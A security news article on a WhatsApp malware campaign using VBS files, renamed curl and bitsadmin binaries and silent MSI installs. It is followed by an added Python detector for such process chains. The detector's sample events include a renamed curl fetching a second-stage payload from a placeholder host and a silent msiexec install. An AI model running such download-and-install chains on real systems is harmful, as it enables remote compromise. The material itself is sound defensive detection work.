Malware & Ransomware (HIGH)

WhatsApp Malware - New Campaign Uses VBS Files for Access

CSCSO Online
Tags: WhatsApp, malware, VBS files, Microsoft Defender, remote access

Basically, hackers trick WhatsApp users into running harmful files that let them control their devices remotely.

Quick Summary

A new malware campaign is targeting WhatsApp users with malicious VBS files. This attack enables persistent access and remote control of infected devices. Microsoft warns users to be cautious and monitor their systems for suspicious activity.

What Happened

Microsoft has issued a warning about a new malware campaign targeting WhatsApp users. This campaign involves the distribution of malicious Visual Basic Script (VBS) files. Attackers have been using social engineering tactics to trick users into executing these files since at least late February. Once the scripts are launched, they initiate a multi-stage infection flow that blends into normal system activity, allowing attackers to pull additional payloads for remote control.

The campaign leverages a combination of living-off-the-land (LOTL) techniques and trusted Windows utilities. By using legitimate tools and platforms, attackers can evade detection and increase the chances of successful execution. This strategy makes it difficult for users and security solutions to identify malicious activity.

Who's Being Targeted

The primary targets of this campaign are WhatsApp users who may receive messages containing the malicious VBS files. These files are disguised as legitimate content, making it easy for unsuspecting users to execute them. Once executed, the scripts create hidden directories on the system, setting the stage for further compromise.

The attackers take advantage of the trust users have in WhatsApp, a widely used messaging platform. This trust, combined with the social engineering tactics employed, significantly increases the likelihood that users will fall victim to the attack.

Signs of Infection

Once the VBS files are executed, users may not immediately notice anything suspicious. The malware operates in the background, utilizing renamed versions of legitimate Windows utilities like curl.exe and bitsadmin.exe. These disguised binaries perform malicious tasks while blending into the environment, making detection challenging.

As the infection progresses, the attackers deploy Microsoft Installer (MSI) packages to maintain control over the infected devices. These packages are not typically flagged as suspicious, allowing the attackers to execute custom actions during installation. Users may only realize something is wrong if they notice unusual behavior or performance issues with their devices.

How to Protect Yourself

To safeguard against this malware campaign, users should be vigilant about the files they execute, especially those received through messaging platforms like WhatsApp. Here are some recommended actions:

  • Monitor script and installer execution: Keep an eye on any scripts or installers running on your device, especially those from untrusted sources.
  • Watch for misuse of legitimate tools: Be cautious of any unexpected behavior from trusted utilities on your system.
  • Track suspicious activity: Regularly check for unusual activity tied to files delivered through messaging platforms.

By staying informed and cautious, users can better protect themselves from this evolving threat.

🔒 Pro insight: The use of LOTL techniques in this campaign highlights the need for enhanced monitoring of legitimate tools and user behavior to detect anomalies.
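The three recommendations above (watch script and installer execution, watch for misuse of legitimate tools, track activity tied to files delivered through messaging apps) map onto process-creation telemetry. The detector below is an added example written for this page; it is not code from the article, from CSCSO Online or from Microsoft. It assumes events shaped like a few Sysmon Event ID 1 fields (Image, OriginalFileName, ParentProcessId, CommandLine), and the sample events, the user-writable path hints and the ".vbs" heuristic are constructed assumptions for the demo. The renamed-binary check relies on OriginalFileName, which comes from the executable's version resource and does not change when the file on disk is renamed, so a renamed curl.exe or bitsadmin.exe still announces itself.

```python
"""Flag process-creation events matching the LOTL patterns described in the article.

Added example for this page, not the article's or Microsoft's code.
Event fields mimic Sysmon Event ID 1; all sample events are constructed.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Utilities the article says the campaign runs under new names. OriginalFileName
# is read from the PE version resource, so a rename on disk does not hide it.
WATCHED_ORIGINAL_NAMES = {"curl.exe", "bitsadmin.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INSTALLER = "msiexec.exe"
# Assumption: attachments saved from a messaging app land in user-writable paths.
USER_WRITABLE_HINTS = ("\\downloads\\", "\\appdata\\local\\temp\\")


@dataclass
class ProcEvent:
    pid: int
    parent_pid: int
    image: str               # full path of the launched binary (Sysmon Image)
    original_file_name: str  # Sysmon OriginalFileName, from the version resource
    command_line: str


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def check_renamed_lolbin(ev: ProcEvent) -> str | None:
    """A watched utility whose on-disk name no longer matches its original name."""
    orig = ev.original_file_name.lower()
    if orig in WATCHED_ORIGINAL_NAMES and basename(ev.image) != orig:
        return f"renamed LOLBin: {ev.image} is really {orig}"
    return None


def check_script_from_user_path(ev: ProcEvent) -> str | None:
    """A script host running a .vbs file out of a user-writable location."""
    if basename(ev.image) in SCRIPT_HOSTS:
        cl = ev.command_line.lower()
        if ".vbs" in cl and any(hint in cl for hint in USER_WRITABLE_HINTS):
            return "script host running .vbs from user-writable path"
    return None


def check_installer_lineage(ev: ProcEvent, by_pid: dict[int, ProcEvent]) -> str | None:
    """msiexec whose ancestry (up to three hops) includes a script host."""
    if basename(ev.image) != INSTALLER:
        return None
    parent = by_pid.get(ev.parent_pid)
    hops = 0
    while parent is not None and hops < 3:
        if basename(parent.image) in SCRIPT_HOSTS:
            return f"msiexec descended from {basename(parent.image)} (pid {parent.pid})"
        parent = by_pid.get(parent.parent_pid)
        hops += 1
    return None


def analyze(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Run every check over the events; return (pid, finding) pairs in event order."""
    by_pid = {e.pid: e for e in events}
    findings: list[tuple[int, str]] = []
    for ev in events:
        for check in (check_renamed_lolbin, check_script_from_user_path):
            result = check(ev)
            if result:
                findings.append((ev.pid, result))
        result = check_installer_lineage(ev, by_pid)
        if result:
            findings.append((ev.pid, result))
    return findings


# Constructed sample chain: explorer -> wscript (.vbs from Downloads) -> renamed curl
# and cmd -> msiexec; plus two benign events that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "EXPLORER.EXE", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe", "wscript.exe",
              r'wscript.exe "C:\Users\alice\Downloads\invoice.vbs"'),
    ProcEvent(300, 200, r"C:\Users\alice\AppData\Local\Temp\.cache\svc.exe", "curl.exe",
              "svc.exe -s -o stage2.bin https://example.invalid/placeholder"),
    ProcEvent(400, 200, r"C:\Windows\System32\cmd.exe", "Cmd.Exe", "cmd.exe /c start.bat"),
    ProcEvent(500, 400, r"C:\Windows\System32\msiexec.exe", "msiexec.exe",
              r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\.cache\pkg.msi /qn"),
    ProcEvent(600, 100, r"C:\Windows\System32\curl.exe", "curl.exe", "curl.exe -V"),
    ProcEvent(700, 100, r"C:\Windows\System32\cscript.exe", "cscript.exe",
              r"cscript.exe C:\Windows\System32\slmgr.vbs /dli"),
]

if __name__ == "__main__":
    for pid, msg in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {msg}")
```

On a real host the same three checks can be fed from Sysmon or Windows Defender process-creation events; the lineage check is the one that distinguishes an MSI a user ran from one an unattended script chain started, which is what the article says the campaign relies on.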

Original article from CSCSO Online
